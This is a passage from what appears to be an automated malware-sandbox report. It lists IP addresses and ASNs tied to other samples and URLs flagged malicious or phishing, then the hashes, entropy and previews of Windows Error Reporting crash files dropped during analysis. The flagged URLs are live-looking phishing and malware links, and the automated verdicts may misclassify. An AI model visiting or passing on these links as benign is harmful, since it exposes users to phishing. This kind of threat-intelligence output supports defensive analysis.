                        • 86.50.90.19
                        AMAZON-02USspc.elfGet hashmaliciousUnknownBrowse
                        • 54.171.230.55
                        cOviNFmw21.exeGet hashmaliciousNeconydBrowse
                        • 52.34.198.229
                        https://ln5.sync.com/dl/3c61e3b30#gum48d7j-5vgyh9gy-tcjv9rp4-ffxvqp5fGet hashmaliciousUnknownBrowse
                        • 15.222.106.233
                        https://tippfloorcovering-my.sharepoint.com/:f:/g/personal/inderjeet_tippfloor_com/EpEIzIGDzrlMs2z8rWgki5MBO5-d64iEaOqqeF3ulFqTiw?e=T39wglGet hashmaliciousUnknownBrowse
                        • 108.158.75.11
                        http://kitces.emlnk1.comGet hashmaliciousUnknownBrowse
                        • 13.227.9.168
                        https://vacilandoblog.wordpress.com/2015/04/22/a-tribute-to-my-mother-in-law-rest-in-peace-april-22-2015/Get hashmaliciousUnknownBrowse
                        • 13.250.84.149
                        https://sendgb.com/Aw8gObHpGVR?utm_medium=dZJEAfc2MGnvjBDGet hashmaliciousHTMLPhisherBrowse
                        • 63.32.181.175
                        mpsl.elfGet hashmaliciousUnknownBrowse
                        • 54.171.230.55
                        https://sendgb.com/dxukcl49bIj?utm_medium=mvC3BJ1YMhqe8znGet hashmaliciousHTMLPhisherBrowse
                        • 52.48.36.35
                        mips.elfGet hashmaliciousUnknownBrowse
                        • 54.171.230.55
                        TANDEMUScOviNFmw21.exeGet hashmaliciousNeconydBrowse
                        • 15.197.204.56
                        Doc Copy-PTD- P2139 INV- P2238.emlGet hashmaliciousUnknownBrowse
                        • 15.197.213.252
                        https://bdb142c8309e44b2310105b0e00240d6.surge.sh/Get hashmaliciousUnknownBrowse
                        • 15.197.193.217
                        AudioplaybackVM--00-32AoTranscript.htmlGet hashmaliciousUnknownBrowse
                        • 15.197.142.173
                        http://frame.wtfGet hashmaliciousUnknownBrowse
                        • 15.197.204.56
                        V-Mail.msgGet hashmaliciousUnknownBrowse
                        • 15.197.142.173
                        https://protect.checkpoint.com/v2/r01/___https:/vlp6cm34.r.us-east-1.awstrack.me/Q5dmyyux:e7Ke7Kjrfnq.ynintwjuqD.htr*7Kh*7KjOBJBJLTmXFRFSIYBSOlvWZ1QLgoUfHylhY/JnF_riAUpCWczNA0yO_jaB*~*oG6AYM23pBoyDNMJ-PJR-NmPFsN*~*VgZA/PF0HUyICotYzOGFnKvZNBMhC*~*KfYclayEc_La*~*ccZq7wY-S_IKBLwx/KWAAv8MVfzRwNM6LCN8Jigf*~*80C6gkuabRjmLM--7qPAcOAlUFFI__5pCS9Bd6d565556c8b*~*/hi595-9hb*~3*gh-a*~*bg-9bgb-ci5/-b9jf76k5b9g*~*-555555do29l0Y3hHjFJM3POpxyJsMjDY*~*5=957___.YzJ1OndhaXRha2VyZXByaW1hcnk6YzpvOmNkMzFiOWRiNjRlNzYwZWExOWZkZjZlZWU4YmI5NjkyOjc6NjQxYjozOTM5M2Y5MjlmZWNkMGUzMGYzMjUxMGFiZDQ0YjU2Mzg5ODdlNDNlNTAyN2VlYjBmMjQxZjc3Mjg5OGNiMWQxOmg6VDpU%3EGet hashmaliciousUnknownBrowse
                        • 15.197.142.173
                        http://ar-oracle.comGet hashmaliciousUnknownBrowse
                        • 15.197.148.33
                        https://happythnkxgiving.appforconstruction.com/KgeM3Get hashmaliciousUnknownBrowse
                        • 15.197.240.20
                        http://idiomas.astalaweb.com/otros/Portugu%C3%A9s/Comunicacion-verbos-en-portugues.aspGet hashmaliciousUnknownBrowse
                        • 15.197.179.7
                        No context
                        No context
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.7045948762016093
                        Encrypted:false
                        SSDEEP:96:l2FYJC3Wssh3zxTMb91QXIDcQvc6QcEVcw3cE/9mS+HbHg/8BRTf3Oy1FhZAX/dD:gSJC3WFF0BU/4ju1zuiFCZ24IO81
                        MD5:D79ECD861FB598613DAE97C6B110DE00
                        SHA1:978BDE9B3EF1681A39742804094083EBECCF04D6
                        SHA-256:9D56EE817A5F5FAF8491B71DE2D4846D7D72A84F840B6951DEC71355EFF66D28
                        SHA-512:475B6F31343EA942F564BC06AF69E7EE184D30CAB508CF0A5DF06874714FF1E01748E2FD3426E44EE40EE0A2F6C44E74A4B46B9C7D51377DFA870E2224D3FADE
                        Malicious:true
                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.8.9.2.1.5.6.6.9.6.4.8.4.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.8.9.2.1.5.8.3.0.5.8.5.1.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.5.8.8.8.e.9.c.-.e.9.4.a.-.4.8.4.c.-.a.9.1.c.-.f.b.0.0.9.6.9.8.3.1.5.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.3.6.0.5.c.7.a.-.a.a.5.1.-.4.a.3.3.-.a.f.3.b.-.1.7.8.2.1.c.d.2.d.1.3.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.m.l.g.b.g.c.2.p.5...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.B.u.i.l.d. .p.r.i.v.a.t.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.7.0.-.0.0.0.1.-.0.0.1.4.-.b.9.8.c.-.e.0.6.9.3.8.4.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.c.8.e.c.3.5.c.7.2.0.6.6.0.3.f.d.7.d.5.b.c.f.3.b.c.3.6.e.4.a.3.0.0.0.0.0.9.0.4.!.0.0.0.0.5.c.b.2.c.9.8.6.3.d.d.c.2.b.a.5.3.4.6.9.6.7.b.f.0.7.8.0.5.5.4.c.8.d.
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.7039509512860884
                        Encrypted:false
                        SSDEEP:96:WlFwOW8Gm0tsXhJozxTMb91QXIDcQvc6QcEVcw3cE/99n+HbHg/8BRTf3Oy1FhZ7:a6n8Grt8SF0BU/Aju1zuiFCZ24IO8I
                        MD5:F466FE17C450EB2CEB242C7F0E502104
                        SHA1:E55613BFF93FAC361CA84BFE9215C24A92A6BF8F
                        SHA-256:D336648306D6A126D713F1DF29416521AE8B0DE8067361BA84AA7B7224C8812D
                        SHA-512:88488B09AC8C9DA048724D9DE45D33F84E3528C84560319F150158E1D9CD2CC7A6F38A44129977162D1A243E8519793C83EA55A0FAAEC253143F1921CC58A7B2
                        Malicious:false
                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.8.9.2.1.5.7.2.3.0.2.1.3.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.8.9.2.1.5.8.3.7.0.8.3.6.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.9.1.e.6.9.2.3.-.1.f.0.b.-.4.1.a.3.-.8.8.6.f.-.f.1.a.f.a.1.3.3.b.7.7.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.1.d.5.7.a.4.-.e.4.4.6.-.4.5.0.3.-.b.a.b.8.-.7.e.a.c.1.0.e.7.c.f.3.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.o.m.s.e.c.o.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.B.u.i.l.d. .p.r.i.v.a.t.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.c.0.-.0.0.0.1.-.0.0.1.4.-.5.9.4.e.-.2.1.6.a.3.8.4.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.c.8.e.c.3.5.c.7.2.0.6.6.0.3.f.d.7.d.5.b.c.f.3.b.c.3.6.e.4.a.3.0.0.0.0.0.9.0.4.!.0.0.0.0.5.c.4.b.a.9.f.f.c.f.b.e.5.2.0.2.9.f.8.b.f.a.d.b.8.8.3.7.6.4.b.7.2.3.d.3.f.
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.6974801132539817
                        Encrypted:false
                        SSDEEP:96:4iFdWXhTxARsXhBszxTMb91QXIDcQvc6QcEVcw3cE/O0t+HbHg/8BRTf3Oy1FhZy:j/WXDARkmF0BU/Yju1zuiFCZ24IO8J
                        MD5:794DB18AA911CB3651F0668B30E4DBFC
                        SHA1:4B30FDB350E4D0DF0301F98F47E9DAC02FE205B1
                        SHA-256:6ED79B979EAA0AD4E5AE6BE5B1D1C7A9A4724B6FF2BB9DFF8038968707FD49E1
                        SHA-512:545C4CBDC6D14450DC48DE9DE1208A58821D1B1FE3C36429297AC6B0BCA7BA813F8051B6DB6A62CFF61B67E6D37106FC448200FC43337195EB089A42EA91F7E7
                        Malicious:false
                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.8.9.2.2.0.9.0.9.7.1.6.0.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.8.9.2.2.0.9.7.3.7.7.8.8.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.2.5.2.9.3.c.8.-.0.7.2.2.-.4.7.8.6.-.9.2.a.3.-.f.6.d.6.7.4.a.c.4.4.d.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.5.9.8.3.1.e.9.-.0.7.1.7.-.4.a.3.f.-.a.8.e.7.-.e.1.9.e.1.9.2.1.a.4.3.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.o.m.s.e.c.o.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.B.u.i.l.d. .p.r.i.v.a.t.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.8.8.-.0.0.0.1.-.0.0.1.4.-.0.4.d.0.-.f.6.8.8.3.8.4.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.c.8.e.c.3.5.c.7.2.0.6.6.0.3.f.d.7.d.5.b.c.f.3.b.c.3.6.e.4.a.3.0.0.0.0.0.9.0.4.!.0.0.0.0.d.5.6.c.3.6.f.5.4.5.1.3.8.c.3.e.7.0.b.5.3.6.5.0.e.c.3.c.f.2.0.8.6.a.d.3.c.
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.6968864431654846
                        Encrypted:false
                        SSDEEP:96:zBFbAmJNosXhGzxTMb91QXIDcQvc6QcEVcw3cE/99n+HbHgnoW6HeOyushZAX/dP:dpA2NoHF0BU/AjzXzuiFdZ24IO8I
                        MD5:2CAD7526A31F60851553C8B796444D15
                        SHA1:1C5BFA1D523DF1270E7276847C787AAF5264E19C
                        SHA-256:64A6C2098862DCDA171001F7235F0B1A27834F84F51853C7DD21CF2725E32745
                        SHA-512:45DC4F796673CF65F0ACB56ED5B39124804E29683D176ED6FAD426A555D78C95B40F9DC2CFA64F4F6FE36FEDE6F46BB3BD3EAC30E3F830678162883066B6D515
                        Malicious:false
                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.8.9.2.2.5.9.2.3.9.8.6.3.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.8.9.2.2.5.9.6.1.4.8.6.3.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.7.1.e.5.0.2.0.-.4.2.c.0.-.4.8.5.8.-.b.e.7.1.-.6.3.0.1.4.2.9.f.f.1.7.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.7.6.e.b.9.8.c.-.5.b.0.6.-.4.d.e.f.-.a.5.0.d.-.4.b.d.7.a.6.8.1.7.b.d.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.o.m.s.e.c.o.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.B.u.i.l.d. .p.r.i.v.a.t.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.b.c.-.0.0.0.1.-.0.0.1.4.-.9.d.4.4.-.f.c.a.6.3.8.4.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.c.8.e.c.3.5.c.7.2.0.6.6.0.3.f.d.7.d.5.b.c.f.3.b.c.3.6.e.4.a.3.0.0.0.0.0.9.0.4.!.0.0.0.0.5.c.4.b.a.9.f.f.c.f.b.e.5.2.0.2.9.f.8.b.f.a.d.b.8.8.3.7.6.4.b.7.2.3.d.3.f.
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.6968846418239283
                        Encrypted:false
                        SSDEEP:96:NeFzSqrm6zsXhNzxTMb91QXIDcQvc6QcEVcw3cE/99n+HbHgnoW6HeOyushZAX/k:QJfr1zqF0BU/AjzXzuiFCZ24IO8I
                        MD5:579A106F2064137F0D9E72855C1A15FE
                        SHA1:05AF4DEA8A48C65BA9B2F8E243A4BCD37899DA99
                        SHA-256:D319865F8AFC535E2AD66CB3912BD91D4428B1DE0B11A7C1BC9704C183FBCF06
                        SHA-512:67FB8D3A59C90E5A011D58D1E64DA55BC1172A74026EE2C0F5EE743D28E13AEDCA83BF81488800E08066FCE22EBFECD5659EDC8F3270B7ACE9FD6A88D4A1AF96
                        Malicious:false
                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.8.9.2.2.0.9.8.4.4.6.3.0.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.8.9.2.2.1.0.2.1.9.6.3.3.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.6.6.3.d.6.2.9.-.c.9.5.5.-.4.8.f.3.-.8.f.d.0.-.8.f.c.f.b.b.3.8.f.7.d.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.b.a.4.8.9.e.f.-.4.7.f.d.-.4.7.2.4.-.9.2.3.2.-.f.6.2.6.3.2.c.f.8.b.6.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.o.m.s.e.c.o.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.B.u.i.l.d. .p.r.i.v.a.t.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.c.4.-.0.0.0.1.-.0.0.1.4.-.a.7.e.8.-.8.0.8.9.3.8.4.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.c.8.e.c.3.5.c.7.2.0.6.6.0.3.f.d.7.d.5.b.c.f.3.b.c.3.6.e.4.a.3.0.0.0.0.0.9.0.4.!.0.0.0.0.5.c.4.b.a.9.f.f.c.f.b.e.5.2.0.2.9.f.8.b.f.a.d.b.8.8.3.7.6.4.b.7.2.3.d.3.f.
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.6904105207040816
                        Encrypted:false
                        SSDEEP:192:9IGPj3eKOEsF0BU/YjzXzuiFdZ24IO8J:hj3eKOEsmBU/YjDzuiFdY4IO8J
                        MD5:663C52A7377C25B15A14090340B2BC47
                        SHA1:2A36B45F9E9B5DE9851B7C31F0D9B609EB3E49EC
                        SHA-256:1D9473ECFB9C4F9E25357344348850C1D913BB122E60F893CF35056121C90A6D
                        SHA-512:1C6E01EA6FC169AEA70BF278D110AFBC00F589EE174DAEDBE9397F6388A14EE7071D3C139E89FD660203DC80E62C0274B9701FCA6553AF4E3755C5B67D9D65B0
                        Malicious:false
                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.8.9.2.2.5.8.6.9.5.6.0.5.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.8.9.2.2.5.9.1.9.5.6.1.4.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.c.9.d.9.e.6.5.-.9.7.a.e.-.4.b.7.d.-.b.5.1.9.-.d.9.7.3.5.9.e.c.0.1.7.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.8.4.c.3.6.8.6.-.b.9.b.1.-.4.8.b.2.-.9.2.2.8.-.e.f.1.2.8.e.2.6.8.3.7.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.o.m.s.e.c.o.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.B.u.i.l.d. .p.r.i.v.a.t.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.1.0.-.0.0.0.1.-.0.0.1.4.-.4.1.1.1.-.7.c.a.6.3.8.4.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.c.8.e.c.3.5.c.7.2.0.6.6.0.3.f.d.7.d.5.b.c.f.3.b.c.3.6.e.4.a.3.0.0.0.0.0.9.0.4.!.0.0.0.0.d.5.6.c.3.6.f.5.4.5.1.3.8.c.3.e.7.0.b.5.3.6.5.0.e.c.3.c.f.2.0.8.6.a.d.3.c.
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 14 streams, Thu Dec 5 17:10:09 2024, 0x1205a4 type
                        Category:dropped
                        Size (bytes):34114
                        Entropy (8bit):2.0098473980093425
                        Encrypted:false
                        SSDEEP:192:5WuRKjE/UOfxvWNey9ScvqW/2auClcTi:scfxyeOvXzuW
                        MD5:E74E04D593962EE3EFCCCFB4CB405C29
                        SHA1:6CE143883E611418639323C312A10D314BF1D74E
                        SHA-256:1242E54CF39F034F7575071F8D062F0C4801136BBE8EBE8F513A072F6B84D3C1
                        SHA-512:74D9779DD5FE37AD8E06B20D58AEC8FCF96798BEE3C1270FC9A2CA36E02765DFA7D3B7DD5CEBA9398DE974BB928B2FAF7823C4667D57B3AF6AA8574505216C89
                        Malicious:false
                        Preview:MDMP..a..... .......q.Qg........................X...............T...........T.......8...........T...............*y......................................................................................................eJ......x.......GenuineIntel............T...........o.Qg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):6280
                        Entropy (8bit):3.71719075814616
                        Encrypted:false
                        SSDEEP:192:R6l7wVeJus64NYEw4u6pr089bWNsfcWLym:R6lXJV6qYEw4uOWGfHf
                        MD5:C99D414FD806DF84B89ABFF8F86DFE96
                        SHA1:05497A8399E6533BB5C3E207CD9861523BC39973
                        SHA-256:84E1D8B93D115B2B8BDC0D54DD4F904F4881BD3B33E34B328586AFFEF2F1F7E0
                        SHA-512:F27D847EF0E17ED70E4AE6033B97E441D17574A79F1999EA8C9B7CFC9A370DBEB9523B30BB453C0018AB77C08DB523FFEE5E3F6892AEAAF484914329A402BAF3
                        Malicious:false
                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.7.2.<./.P.i.
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4648
                        Entropy (8bit):4.465554044932767
                        Encrypted:false
                        SSDEEP:48:cvIwWl8zsZkJg77aI9ZuWpW8VYvYm8M4J+maqF8PW+q8Tag/sTy2p8d:uIjfUI7PP7V/J+rJuiaysTXp8d
                        MD5:80F6DB076DF7B0C03B91F0868FEF2E4E
                        SHA1:280AB9F45B77F7FE1E4BE61A1516C59F79261598
                        SHA-256:B24903C2D5DC5CF0C8EC68990C5A4C7DBF12D8D46EB42ADE3D6B980194FAAC50
                        SHA-512:FAB07A2113B7289F73C1224733739C6F071682EBFCBD06DE56618E50DBA111CE00D69E325C4244BC593DBDF2358AB366F5E9A955DB71EF213FB01E36BB175CC6
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618252" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 14 streams, Thu Dec 5 17:10:09 2024, 0x1205a4 type
                        Category:dropped
                        Size (bytes):33646
                        Entropy (8bit):2.013418893985959
                        Encrypted:false
                        SSDEEP:96:5Q8s0SU+TTMHCUdE5tUi7D331MQGzDXaeWdKcMC7oQPdyMr4rpWIkWIl/I45IUHD:5iCCHUO5GzDqehSRyMso5IUHEkn/
                        MD5:4BD1A3EC04BA3B9F6C57EFACBD3C5591
                        SHA1:6DDDE6536C5953CF2005246620DA1401B97E752C
                        SHA-256:EFA61C707CE0465CD9AA7FE9AAC3AA12FAD7B4929CC76DF36CFB100A36ADBEE2
                        SHA-512:D1514AAA6B8F802DAA30144C7F39B7F0A643E9FD2E6A5A24106F31131B60018EAADD983FB8D28FD5EA29E43C5E2EED162B08F72DB271F34916302650578FD298
                        Malicious:false
                        Preview:MDMP..a..... .......q.Qg....................................................T.......8...........T................x......................t...............................................................................eJ..............GenuineIntel............T...........p.Qg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8240
                        Entropy (8bit):3.6918612188599638
                        Encrypted:false
                        SSDEEP:192:R6l7wVeJb26DL6Yrl6jkgmf04u6prZ89bWdsfxym:R6lXJq6DL6Yp6ggmf04u5WWfl
                        MD5:4D44223635938380AE14BA7F471714A6
                        SHA1:07AADF9CD3AA1B47DD165F2E1F6B67F9F1A67DBF
                        SHA-256:627DD871B94AC63AE4C387E552D3643BF94D595D73AE22103358C67F4BE078AF
                        SHA-512:C546968491B947EA46F44D6B1104AE5853011C10AE2EB89F9DFA7D4F943B70AB27561A1284B6168D0FDECBEAFE01A3BF22BEA2D950A6EDAAB5B6B6676EF1F59A
                        Malicious:false
                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.1.3.2.<./.P.i.
                        Process:C:\Windows\SysWOW64\WerFault.exe
